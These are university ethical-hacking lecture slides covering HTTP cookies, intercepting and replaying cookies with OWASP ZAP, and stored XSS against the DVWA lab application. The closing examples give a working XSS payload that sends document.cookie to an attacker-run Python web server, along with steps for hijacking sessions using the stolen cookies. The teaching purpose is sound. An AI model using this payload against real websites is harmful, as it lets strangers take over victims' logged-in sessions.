INFO3002 Ethical Hacking Principles and Practice

Lecture 11: Cookie, ZAP and XSS attacks

School of Computer, Data and Mathematical Sciences

Western Sydney University
1
Lecture outline
We first look at the basics of Cookie, and then a tool
called ZAP to observe/hijack cookies, and finally the details
of XSS attacks, which often steal cookies from victims’
browsers.

■ Cookie
■ OWASP Zed Attack Proxy (ZAP)
■ Cross-Site Scripting (XSS) attacks

2
 What's a Cookie
■ A cookie is a string that a website sends to a user's
browser, which will store it and send it back together with
the next request to this website.
■ In many cases, you can view a cookie as a user's unique
ID card, such that the website knows that this user
returns.

Reference:
https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies

3
Typical usage of cookies
■ Session management (user logins, shopping carts)
■ Personalization (user preferences)
■ Tracking (analyzing user behavior)

Since cookies are carried by HTTP messages, we will

have a quick review on the format of HTTP messages first in
the next several slides before we talk about the details of
how to set and send cookies.

4
Review: the format of HTTP messages
■ Both Request and Response messages share the same
format:
▬ Start line
o contains command for Request, and status for Response
▬ headers
o each header uses one line
▬ an empty line
o used to indicate the start of the body
▬ body

5
An example of HTTP Request messages

GET /index.php?ID=1234&age=24 HTTP/1.1

/* empty */

6
NB: Query String in HTTP Request
■ In GET, user input can be appended to the end of URL,
starting with a ‘?’. This is called a query string.
▬ E.g.: http://www.test.com/index?ID=1234&name=John+Smith&age=24

■ In a query string:
▬ A name=value pair is used and different pairs are separated by the
ampersand '&'.
o “name” refers to the “name” attribute of an HTML input device.
▬ Spaces are replaced with the ‘+’ character and any other non-
alphanumeric characters are replaced with a hexadecimal value.

7
An example of HTTP Response messages

8
Set Cookies
■ A server sets or updates a cookie at a user's browser by using
the 'Set-Cookie' header in the HTTP Response message.
■ The syntax is:
▬ Set-Cookie: <name>=<value> [; attributes (optional)]

■ For example:
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry

[followed by an html page]

9
Send Cookies back
■ A browser sends a cookie back to a server by using the
'Cookie' header in the HTTP Request message.
■ The syntax is:
▬ Cookie: <name>=<value> [; more cookies for this site]

■ For example:
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry

10
Cookie Attributes
■ A cookie can have the following attributes:
▬ Expires (or Max-Age)
▬ Secure
▬ HttpOnly
▬ Domain
▬ Path

■ All of them are very important!

11
 Attribute – Expires or Max-Age
■ If a cookie does not have the 'Expires' or 'Max-Age' attribute,
it is a session cookie.
▬ A browser will not save it when the browser is closed.
▬ The server will remove it after a certain period of inactivity.
▬ A session cookie is typically used in a login process to identify a user.

■ Otherwise, it is a persistent cookie, which will be saved in

hard drive until it expires at the time specified by the 'Expires'
or 'Max-Age' attribute.
▬ A persistent cookie is typically used in a long term to identify a user.
▬ Syntax for setting a persistent cookie:
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2023 07:28:00 GMT;

12
 Attribute – Secure
■ A cookie with the 'Secure' attribute will only be sent to the
server when a request is made using the HTTPS protocol.
■ In sensitive cases (e.g., logging in), cookies should have the
'Secure' attribute set, and transferred using the HTTPS.
■ However, sometimes web developers forget about this, which
gives rise to the vulnerable authentication — the No.2 web
vulnerability.
■ Syntax for setting the 'Secure' attribute:
Set-Cookie: id=a3fWa; Secure;

13
 Attribute – HttpOnly
■ The 'HttpOnly' attribute indicates that a cookie can only be
exposed in the HTTP messages.
▬ This means that a cookie cannot be accessed by any client-side code
such as Javascript.
▬ As to be seen later in this lecture, a typical consequence of XSS attacks
is that cookies are stolen by malicious Javascript code.

■ So setting the 'HttpOnly' attribute is the key for preventing

cookies from being stolen by XSS attacks.
■ Syntax for setting the 'HttpOnly' attribute:
Set-Cookie: id=a3fWa; Secure; HttpOnly;

14
 Attributes – Domain and Path
■ The Domain and Path attributes define the scope of a cookie,
i.e., the set of URLs with which the cookie should be sent
back.
■ Domain specifies the host or domain to which the cookie will
be sent.
■ If not specified, it defaults to the host of the website that sets
this cookie. No other hosts will be included.
■ However, if a domain is specified, hosts in this domain and its
subdomains are always included.
▬ E.g., if Domain=mozilla.org is set, cookies are included on subdomains
like developer.mozilla.org.

15
 Attributes – Domain and Path (cntd)
■ Path specifies the path that must exist in the URL when
sending the Cookie back.
▬ Note that subdirectories of Path will be matched as well.

■ E.g., if Path=/docs is set, these paths below will all be

matched:
▬ /docs
▬ /docs/Web/
▬ /docs/Web/FTP/somehow.html

■ If Path is not specified, it defaults to the directory part of the

URL that sets this cookie.

16
 Attributes – Domain and Path (cntd)
■ Syntax for setting the 'Domain' and 'Path' attribute:
Set-Cookie: id=a3Wa; Domain=domain-name; Path=directory-path

Examples:
HTTP/1.0 200 OK
Set-Cookie: LSID=DQAAAKabEaem_vYg; Path=/accounts;
Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVncdDKrdst; Domain=foo.com; Path=/;
Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly

References: HTTP State Management Mechanism,

https://tools.ietf.org/html/rfc6265#section-4.1.2.3

17
Lecture outline
■ Cookie
■ OWASP Zed Attack Proxy (ZAP)
■ Cross-Site Scripting (XSS) attacks

18
ZAP overview
■ The OWASP Zed Attack Proxy (ZAP) is an open-source
comprehensive web pentesting tool.
■ ZAP mainly has the following functions:
▬ Intercepting web proxy
▬ Web crawler
▬ Vuln scanner
▬ Fuzzer

■ Another tool similar to ZAP is Burp Suite, which is a

commercial tool. Preferring open source tools, we will use
ZAP in this subject.

19
ZAP overview (cntd)

■ ZAP is written in JAVA, so it needs JRE to run.

■ ZAP is cross-platform because of the implementation by
Java.
■ The official ZAP User Guide is available in two forms:
▬ as context-sensitive help within ZAP
▬ online at https://www.zaproxy.org/getting-started/

20
ZAP Installation

■ ZAP may or may not be installed in Kali Linux by default

depending on the Kali version.
■ If ZAP is not installed on your Kali, simply perform the
following two steps to install it.
▬ $ sudo apt update
▬ $ sudo apt install zaproxy
NB: On the Kali VMs hosted in school cloud, ZAP is installed, so you
don't need to run the two steps above.

21
 ZAP – An intercepting web proxy
■ Web proxy: used to send/receive HTTP messages to/from
servers on behalf of browsers.
HTTP HTTP
Requests Requests
ZAP Web
Browser
Proxy Server
HTTP HTTP
Responses Responses

■ Intercepting proxy: further allows you to stop, observe and

modify the HTTP messages before forwarding them.
■ In this subject, we'll only focus on the intercepting feature of
ZAP.
▬ Other features of ZAP are also very powerful, but we'll leave them for
your own exploration.
22
ZAP – Starting
■ In Kali desktop, Click the Kali Applications Start button on
the top-left corner à 'Web Application Analysis' à 'ZAP'

23
 ZAP – Starting (cntd)
■ When asked 'Do you want to persist the ZAP session?', you should
use the default 'No', and click 'Start'.
▬ 'persist' means 'save' in the parlance of ZAP. Usually, you do not need to
save a ZAP session.

24
 ZAP – Starting (cntd)
■ If you are asked to manage Add-ons, you can close that window
straight away, not doing anything.

25
 ZAP – Starting (cntd)
■ If you are asked to update it to a newer version, you should
NOT do that. Otherwise, the system interface may be
different from what we teach in the slides.

26
 ZAP – Starting (cntd)
■ Then, you will see the GUI of ZAP. In this unit,
▬ you will not be asked to use the 'Quick Start' tab, which is mainly for web
vuln scanning.
▬ instead, you will be asked to click the 'Request' and 'Response' tabs to
examine the HTTP Request and Response messages.

27
 ZAP – The port number 8081
■ By default, ZAP will listen on port 8081 to relay messages for
browsers.
■ To verify this, you can do 'sudo ss -lntp' on Kali.
▬ '-lntp' will show listening TCP ports in numeric format and also their
associated processes.
▬ '-antp' is also OK, but it will list all TCP ports.

28
Configure Firefox to use ZAP as proxy
■ In order for ZAP to intercept messages, we need to point
Firefox at ZAP first.
■ Start Firefox. Then, click the 'settings' button on top right:
■ Preferences à Network Settings (in the bottom)

29
 Configure Firefox to use ZAP as proxy
(cntd)
■ Firefox automatically contacts some hosts in firefox.com,
Mozilla.org, and digicert.com to get updates, etc.
■ You need to add these domains to exceptions, so the traffic to
these domains will not go through the ZAP proxy and hence
will not disturb your observations.

30
ZAP – Toolbar icons 1-5 for
intercepting messages

1 2 3 4 5
1. When its color is green, no interception will happen, i.e., ZAP
will pass on all messages. To start interception, you need to
click this icon to change its color to red. Then, ZAP will
withhold all messages unless you click icon 2 or 3 to release
them.
2. Release the current withheld Request or Response
message.

31
ZAP – Toolbar icons for intercepting
messages (cntd)

1 2 3 4 5

3. Release all current and future Request/Response messages

until a breakpoint is reached.
§ A breakpoint can be created by clicking icon 5.

4. Discard the current withheld message.

32
ZAP – Toolbar icons for intercepting
messages (cntd)

1 2 3 4 5

5. Create a breakpoint by
using certain string
matching criteria.
Note: How to create
breakpoints is not required in
this unit.

33
Example 1: Using ZAP to intercept and
observe HTTP messages
a) In ZAP, click icon 1 to start interception.
b) In Firefox, enter the following URL:
http://<IP of Metasploitable2>/dvwa/
• Don't use 'https' here, which will make the messages hard to observe. It
may automatically switch to ‘https’ later, which is fine.
• The URL should include a slash ‘/’ in the end, otherwise you’ll observe
more messages for redirections.

Then, you'll see a warning about the OWASP Zed Attack

Proxy Root CA. Here you should click "Advanced", and then in
the bottom click "Accept the Risk and Continue".
See the screenshots in the ensuing slides.

34
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
c) Proceed to the site anyway:

35
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)

After clicking this one, the Firefox will stop there.

To proceed, you need to switch to ZAP to release the

intercepted HTTP messages. Follow the ensuing slides.

36
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
d) In ZAP, you will see the first HTTP GET message from Firefox is
intercepted, and displayed in a new tab 'Break'. Then, you should click
icon 2 to forward this message to web server.

The header part consists of many lines,

with the first line containing the URL
requested.

The body part is empty

37
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
e) Then, you will see the HTTP Response message containing two cookies
is intercepted, and displayed in the tab 'Break'. Continue to forward this
message by clicking .

Set a cookie named 'PHPSESSID'

Set a second cookie named 'security'
Since you haven't been authenticated yet, the web server will redirect you to the
page 'login.php'. The 'Location:' header is used for redirection. 38
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
f) The HTTP GET message for 'login.php' is intercepted. Note that this
message contains the two cookies received from the server before.
Continue to forward this message by clicking

The 'Cookie:' header contains two cookies

39
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
g) The HTTP Response message for 'login.php' is intercepted. Besides the
headers, this message also has a body part which contains the HTML
code of login page. Continue to forward this message by clicking

The HTML page generated by 'login.php'

40
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
h) If this is the first time you use Firefox to visit DVWA, you’ll observe the
request and response messages for css file and javascript files. For all
these messages, you should click to pass them. Then, in Firefox, the
login page will be displayed. Enter the username and password, and then
click 'Login'.
▬ Username: admin
▬ Password: password

41
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
i) The HTTP POST message with username and password is intercepted. Note
that this message contains the two cookies received before, and the
username and password in the body part. Continue to forward this message
by clicking

Username and password carried in the body of POST message

42
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
j) The HTTP Response message for username and password is
intercepted. It redirects the browser to the 'index.php' page after
successful login. Continue to forward this message by clicking

Redirect to 'index.php' using the 'Location:' header.

43
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
k) The HTTP GET message for 'index.php' is intercepted. Note that it still
carries those two cookies. Continue to forward this message by clicking

44
 Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
l) The HTTP Response message for 'index.php' is intercepted. Its body part
contains the HTML page generated by 'index.php'. Continue to forward
this message by clicking . If you observe the request and response
messages for css file and javascript files, continue to forward them as
well.

45
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
m) In Firefox, the DVWA page generated by 'index.php' is displayed.

46
Notes to Example 1
■ All the previous Request/Response pairs passing through
ZAP can be reviewed by clicking the 'History' tab. You can
highlight a message pair, and then look at their details by
clicking the 'Request' or 'Response' tab above.

■ You must be patient enough to understand the whole

process, which contains many request/response exchanges.

47
Example 2: Using ZAP to modify
HTTP messages
a) Continue on previous example. In Firefox, set the DVWA
security level to 'low'. During this process, you need to pass
every message in ZAP by clicking . After the security level
is successfully changed, the 'History' tab should show about
three or four pairs of messages for 'security.php'.

48
Example 2: Using ZAP to modify
HTTP messages (cntd)
b) Highlight the last pair of messages from 'History' and examine
its GET message by clicking the 'Request' tab. Then, copy
and paste the entire 'Cookie:' header in this message to a text
editor, say, 'mousepad'.

Copy and paste this entire line to a text editor

49
Example 2: Using ZAP to modify
HTTP messages (cntd)
c) Close Firefox, such that Firefox removes both cookies from its memory:
'security' and 'PHPSESSID', since these two are session cookies.

d) Start Firefox and visit http://<IP of Metasploitable2>/dvwa/ again.

NB: The trailing '/' in the URL above must be included.
c) In ZAP, you will notice that the GET message for this does not have those
two cookies, looking exactly the same as the first GET message
intercepted in Example 1.

50
Example 2: Using ZAP to modify
HTTP messages (cntd)
f) Click the window containing the GET message, and you'll see that you
can edit the message.

g) Copy and paste the 'Cookie:' header saved in mousepad into this
message.

Insert the 'Cookie:' header here

51
Notes to the previous Step (g)
■ If you continue without this step, you will have to log into
DVWA using 'admin' again, and change the security level to
'low' by yourself again.
■ This step is used to simulate the scenario below:
▬ Cookies are stolen and used by a hacker in another browser while the
true user is still considered active at the web server.
▬ Note: Web server typically timeouts a session upon 20 minutes of
inactivity.

■ As you'll see next, after you forward this message with

inserted cookies to web server, you'll be returned the DVWA
interface with the security level being 'low‘ without going
through login page.

52
Example 2: Using ZAP to modify
HTTP messages (cntd)
h) Forward the modified GET message by clicking .

i) Forward the ensuing Response message by clicking as well.

j) In Firefox, you'll see the DVWA interface with security level being 'low'.

Note the 'Security Level: low' in the bottom

53
Notes to Example 2
■ Any part of HTTP message can be modified by ZAP before
forwarding the message.
■ Besides ZAP, modern browser add-ons also allow you to
add and modify cookies. You can use them to manipulate
cookies as well.
▬ Firefox: Cookie Manager+
▬ Chrome: Cookie Inspector

■ To prevent interception and eavesdropping, it is required to

use HTTPS if the cookies involved are sensitive.
▬ HTTPS can prevent Man-In-The-Middle attacks in most cases.
▬ Actually, you see no sensitive websites using HTTP today.
54
Lecture outline
■ Cookie
■ OWASP Zed Attack Proxy (ZAP)
■ Cross-Site Scripting (XSS) attacks

55
Prologue to XSS attacks
■ In the previous example, the cookies were stolen by
interception, which is not very realistic in practice.
■ Another way is by eavesdropping of course, but this can be
easily defeated by using HTTPS as well.
■ An effective way is by XSS attacks, which we will talk about
next.

56
XSS Overview
■ In XSS attacks, attackers use flawed web applications to
send malicious client-side code to browsers.
■ XSS attacks can occur when a web application does not
sanitize the users inputs used to generate outputs to
browsers.
▬ Attackers can include malicious client-side code in such inputs.
▬ XSS attacks are also a kind of injection attacks.

57
XSS Types
■ There are mainly three types of XSS attacks:
▬ Persistent (Stored)
▬ Non-persistent (Reflected)
▬ DOM-based

■ The first two are the most important, and will be covered in
our lectures. You are encouraged to explore the last one
yourself if interested.

Reference:
https://en.wikipedia.org/wiki/Cross-site_scripting

58
Persistent (Stored) XSS

■ Occurs when a hacker's malicious inputs are saved into web

applications' database without sanitization, and then
displayed on web pages.
▬ Example: Enter malicious JS code into a web page that allows users to
leave and view comments. When other users view the web page
containing these comments, they will be attacked.
▬ Characteristic: The malicious JS code is saved in the database.

59
Non-Persistent (Reflected) XSS

■ Occurs when the malicious input contained in the URL query

strings are echoed back from web server to browser for
displaying a web page, with the input not sanitized.
▬ Example: Compose and distribute a URL with a query string containing
malicious JS code. When a user clicks this URL, the query string will be
processed by the web server. In most cases, the data contained in the
query string will be sent from the web server to the user’s browser for
displaying a dynamic web page. Thus, the malicious JS code contained
in the query string gets the chance to be executed by the browser.
▬ Characteristic: The malicious JS code is injected into the URLs only, and
will not be saved in the database.

60
XSS Consequences
■ Although browsers only allow JS to do limited things, the
consequence of XSS attacks can still be very serious.
■ Both types of XSS attacks can do harm in the following
ways:
▬ Modify web pages
▬ Redirect users to malicious web pages
▬ Steal cookies and hence steal the HTTP session (the focus in this
lecture)
▬ Access users' webcam, geolocation, etc.
▬ And more …

61
Stored XSS examples
■ We will next give several examples of Stored XSS attacks
using the DVWA page that contains XSS vulnerability.
▬ among which we'll show how to steal cookies from browser.

■ We will detail Reflected XSS in our next lecture.

62
Set Firefox to use 'No Proxy'
■ Before we demo the examples, we need to revert the proxy
settings in Firefox to 'No proxy', because we are not going to
use ZAP, but XSS to get Cookies.

■ Then, in Firefox, we enter the URL of the DVWA website.

63
Ensure to change Security Level to 'Low'
■ After logging in, click 'DVWA Security', and then change the
level to 'Low', and then click 'Submit'.

64
Visit the Stored XSS page in DVWA

The previous
Messages left by
visitors are listed
here

Click ‘XSS stored’, you’ll arrive at this page.

65
Allow more characters in the 'Message' field
to accommodate long JS code

Use mouse to
activate the
'Message'
field, then
right click

Then, click ‘Inspect

Element’.

66
Allow more characters in the 'Message' field
to accommodate long JS code (cntd)

Double click the 'maxlength' attribute. Change the value of

'maxlength' from 50 to a larger one, say, 200. Then, close the
Inspector window.

NB: this can also be achieved by enabling the interception

in ZAP and modifying the HTML page from there.
67
Example 1: Generate alert box
■ Enter crafted inputs for the 'Name' and 'Message' fields as
shown below, and then click 'Sign Guestbook'.

Popping up an alert box; an example of malicious JS

code.
68
Example 1: Generate alert box (cntd)
■ Then, an alert box is popped up. Note that in the Messages list,
the code inside the <script> tag won't be displayed by browsers.

JS code won't be displayed, so users won't know about it

if the JS code does things quietly! 69
Example 1: Generate alert box (cntd)
■ Now let's try visiting this page using another computer.
■ Use the IE at Win7 VM to visit the DVWA site.
▬ Set the security level to 'low'.
▬ Visit the 'XSS Stored' page.
▬ IE will download the guest messages and hence execute the JS code, and
get attacked too!

70
Reset the database
■ Before demonstrating the next example, we'd like to remove the
previous crafted message from the database, such it won't appear
and disturb our future demos.

■ To achieve this, we can use the 'Setup' page in the DVWA website.

Click this button to restore the database to its original

state. Only one click will do the job for you.
71
Example 2: Retrieve Cookies in JS
■ We can use the JS object document.cookie to retrieve all cookies
associated with the current HTML document.
■ To demo this, visit the 'XSS stored' page in DVWA again (remember
to enlarge the 'maxlength' attribute for the 'Message' field as well),
and then enter the inputs for the 'Name' and 'Message' fields as
shown below.

72
Example 2: Retrieve Cookies (cntd)
■ We'll see the cookies are returned in the alert box.

73
Example 2: Retrieve Cookies (cntd)
■ Similar to Example 1, if you visit the 'XSS Stored' page via the
IE at Win7 VM, IE will download the guest messages and
hence execute the JS code, and get attacked too!
▬ You need to see the security level to ‘low’ before visiting this ‘XSS Stored’
page.

74
Example 3: Steal Cookies
■ In Example 2, the cookies are displayed in a victim’s own
browser, so the attack is harmless.
■ In this example, we'll show how to send the retrieved cookies
to a remote attacker machine.
■ This can be achieved by
▬ At the attacker machine, set up a web server to receive HTTP requests
that contain stolen cookies.
▬ In the crafted JS code, leverage the <img> tag's src attribute to include
the HTTP requests that can send stolen cookies to the web server set up
by the attacker.

75
Example 3: Steal Cookies (cntd)
■ In a Kali terminal, set up a simple web server using the
http.server module of Python3.
▬ The '-m' option is used to specify the module name.
▬ The http.server module will display the URLs received and try to serve
those URLs.
o To be seen in the next slide, the JS code will include the stolen cookies in the
URL of an image.

76
Example 3: Steal Cookies (cntd)
■ In Firefox at Kali, visit DVWA site, change Security Level to
'low', and browse the 'XSS Stored' page.
■ Enter the inputs as shown below and submit.
NB: the code inside the <script> is:
new Image().src="http://192.168.153.132/a.gif?" + document.cookie

This gif does not

need to exist.
The IP addr of the simple web server. You
should replace it with the IP of your Kali VM. 77
Example 3: Steal Cookies (cntd)
■ In the terminal of http.server, we will see the following displayed.

The '%20' is a space character.

■ So the cookies are successfully stolen.

■ A hacker can then start his/her own browser and insert these two
cookies to obtain a logged-in session.

78
Example 3: Steal Cookies (cntd)
■ Since the message containing the JS to steal cookies is stored in
the database of DVWA, every user visit the 'XSS Stored' page of
DVWA will download this message and run the JS code. Therefore,
their cookies will be reported to the http.server as well.

■ Let's prove this by using the IE in Win7 to visit this page. We'll do:
▬ Log into the DVWA website using IE.
▬ Change the Security Level to 'low'.
▬ Browse the 'XSS Stored' page.

■ Then in the terminal of the http.server, we'll see another set of

cookies:

79
We will talk about Reflected XSS and XSS Defence in
our next lecture.

Example Short Answer Question for this

lecture:
■ List the six attributes that a cookie can have.

80
Lecture Summary
■ Understanding how Cookies work is very important.
■ Interception web proxy is an essential tool for web
hackers.
■ Stored XSS attacks manage to store malicious JS code in
a website’s database, and can harm any user who
accesses this website.

81
References
■ HTTP Cookie: https://developer.mozilla.org/en-
US/docs/Web/HTTP/Cookies
■ ZAP User Guide: https://www.zaproxy.org/docs/desktop/
■ XSS attacks: https://en.wikipedia.org/wiki/Cross-
site_scripting

Big reminder:
• Lab 10 will be due next week. Please start it
asap!

82